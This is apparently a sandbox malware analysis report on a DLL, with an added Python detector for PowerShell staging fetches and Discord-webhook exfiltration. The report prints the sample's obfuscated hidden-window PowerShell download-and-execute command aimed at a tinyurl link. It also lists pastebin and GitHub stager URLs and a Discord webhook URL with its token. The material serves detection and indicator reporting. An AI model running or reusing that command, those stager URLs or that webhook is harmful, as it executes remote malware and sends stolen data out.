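The traffic above is the pattern a defender can key on: the stock Windows PowerShell User-Agent (WindowsPowerShell/5.1.19041.1682) fetching a pastebin raw paste, a raw.githubusercontent.com text file and a tinyurl short link as stagers, then POSTing JSON to a Discord webhook URL. Every webhook POST in this run was answered with 404, which means Discord did not find that webhook, so the exfil did not land here; the webhook id and token embedded in the URL are still the indicator to report. The following Python is an added example, not part of the Joe Sandbox report, that runs that detection over a constructed tab-separated HTTP log whose hosts, paths and User-Agent mirror the report. The log format, the STAGING_HOSTS table, the Finding type and the benign control line are assumptions of the example.

```python
"""Flag PowerShell staging fetches and Discord-webhook exfil in HTTP logs.

Added example, not part of the Joe Sandbox report. The one-request-per-line,
tab-separated log format and the SAMPLE_LOG entries below are constructed to
mirror the hosts, paths and User-Agent the report records.
"""
import re
from collections import Counter
from dataclasses import dataclass, field

# Hosts the sample used to pull its next stage or resolve a short link, with
# the path shape seen in the report. Assumed table; extend for your estate.
STAGING_HOSTS = {
    "pastebin.com": re.compile(r"^/raw/[A-Za-z0-9]+$"),
    "raw.githubusercontent.com": re.compile(r"^/[^/]+/[^/]+/[^/]+/.+"),
    "tinyurl.com": re.compile(r"^/[A-Za-z0-9]+$"),
}
# Default User-Agent of Windows PowerShell's WebClient / Invoke-WebRequest.
POWERSHELL_UA = re.compile(r"WindowsPowerShell/\d")
# A Discord webhook URL embeds the webhook id and its secret token; anyone
# holding the URL can post to the channel, so the token is worth extracting.
WEBHOOK_PATH = re.compile(r"^/api/webhooks/(?P<id>\d+)/(?P<token>[A-Za-z0-9_-]+)$")


@dataclass
class Finding:
    kind: str                 # "staging" or "webhook_exfil"
    src: str
    host: str
    path: str
    detail: dict = field(default_factory=dict)


def parse_line(line):
    """Constructed format: src<TAB>method<TAB>host<TAB>path<TAB>status<TAB>user_agent."""
    src, method, host, path, status, ua = line.rstrip("\n").split("\t", 5)
    return {"src": src, "method": method, "host": host,
            "path": path, "status": int(status), "ua": ua}


def classify(rec):
    """Return a Finding for one parsed request, or None if nothing matched."""
    pat = STAGING_HOSTS.get(rec["host"])
    if (pat and rec["method"] == "GET" and POWERSHELL_UA.search(rec["ua"])
            and pat.match(rec["path"])):
        return Finding("staging", rec["src"], rec["host"], rec["path"])
    m = WEBHOOK_PATH.match(rec["path"])
    if rec["host"] == "discord.com" and rec["method"] == "POST" and m:
        # A 404 on a webhook POST means Discord did not find the webhook:
        # the exfil attempt failed, but id and token still go in the report.
        return Finding("webhook_exfil", rec["src"], rec["host"], rec["path"],
                       {"webhook_id": m["id"], "token": m["token"],
                        "webhook_live": rec["status"] != 404})
    return None


def analyze(lines):
    """Classify every non-empty line; return (findings, Counter by kind/host)."""
    findings = []
    for line in lines:
        if line.strip():
            f = classify(parse_line(line))
            if f:
                findings.append(f)
    return findings, Counter((f.kind, f.host) for f in findings)


# Constructed sample log mirroring the report's traffic, plus one browser
# request as a benign control. Webhook id/token are the ones the report shows.
PS_UA = ("Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) "
         "WindowsPowerShell/5.1.19041.1682")
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/129.0"
WEBHOOK = ("/api/webhooks/1285453590428782614/"
           "2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2")
GABER = "/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt"
SAMPLE_LOG = [
    f"192.168.2.6\tGET\tpastebin.com\t/raw/sA04Mwk2\t200\t{PS_UA}",
    f"192.168.2.6\tGET\traw.githubusercontent.com\t{GABER}\t200\t{PS_UA}",
    f"192.168.2.6\tGET\ttinyurl.com\t/yeykydun\t301\t{PS_UA}",
    f"192.168.2.6\tPOST\tdiscord.com\t{WEBHOOK}\t404\t{PS_UA}",
    f"192.168.2.6\tGET\tpastebin.com\t/raw/sA04Mwk2\t200\t{PS_UA}",
    f"192.168.2.6\tGET\tpastebin.com\t/raw/sA04Mwk2\t200\t{BROWSER_UA}",
    f"192.168.2.6\tGET\traw.githubusercontent.com\t{GABER}\t200\t{PS_UA}",
]

if __name__ == "__main__":
    found, counts = analyze(SAMPLE_LOG)
    for f in found:
        print(f.kind, f.src, f.host, f.path, f.detail)
    print(dict(counts))
```

The browser-UA fetch of the same paste is deliberately left unflagged: the signal is the PowerShell client pulling from paste and short-link hosts, not the hosts alone. Feed analyze() real proxy or Zeek HTTP records by mapping their fields into the same six-tuple.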
Source: powershell.exe, 00000007.00000002.3055012745.000002271A54D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mT
Source: powershell.exe, 00000006.00000002.2569213401.000002768074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227027AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789E1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B88E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com
Source: powershell.exe, 00000006.00000002.2929908311.00000276901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2929908311.000002769006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.2569213401.000002768162C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227035FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B58A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D79B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7E8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7EA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E65E63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6631A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66334000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000001C.00000002.2819493490.0000025E65E63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubuserconte
Source: powershell.exe, 00000006.00000002.2569213401.00000276803D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227023A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C53D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7F3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E663B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E663E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000001C.00000002.2819493490.0000025E663B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000007.00000002.2576842522.00000227023A3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt2
Source: powershell.exe, 00000006.00000002.2569213401.0000027680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022701FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E65945000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2569213401.0000027680225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.000002768160B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.000002768129A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227021F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227035DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227032F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5423000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4495000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D77A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tinyurl.com
Source: powershell.exe, 0000000D.00000002.2479111424.000002789D179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tinyurl.com/yeykydun
Source: powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001C.00000002.3255147271.0000025E7D9E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000006.00000002.2569213401.0000027680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022701FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B748C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6591E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6590B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.2569213401.000002768074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227027AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C5B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789E1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B88E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
Source: powershell.exe, 00000006.00000002.2569213401.000002768074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227027AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789E1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B88E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 00000006.00000002.2569213401.0000027681730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703735000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B59D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D8A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7FC3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 0000001C.00000002.2819493490.0000025E66490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6648C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6646D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66469000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66482000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.2569213401.000002768089A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227028F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5423000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E65E63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.2929908311.00000276901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2929908311.000002769006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000D.00000002.2479111424.000002789D77A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66324000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 0000000D.00000002.2479111424.000002789D77A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7E8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6631A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66324000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227023A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C53D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E663E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000006.00000002.2569213401.00000276803D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.000002768162C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227023A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227035FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B58A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D7C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C53D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D79B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7ECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7EA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66334000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6635B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000006.00000002.2569213401.00000276803D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.comX

System Summary

Source: amsi64_2536.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_4040.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_2992.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_1396.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_2248.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_3780.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2536, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4040, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2992, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1396, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2248, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_2536.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_4040.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_2992.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_1396.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_2248.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_3780.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2536, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4040, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2992, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1396, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2248, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.troj.evad.winDLL@39/19@5/5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1220:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:644:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_naivbnpe.phl.ps1
Source: HQsitBLlOv.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\loaddll64.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\HQsitBLlOv.dll,DllRegisterServer
Source: HQsitBLlOv.dll | ReversingLabs: Detection: 42%
Source: unknown | Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\HQsitBLlOv.dll"
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\HQsitBLlOv.dll
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\HQsitBLlOv.dll,DllRegisterServer
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
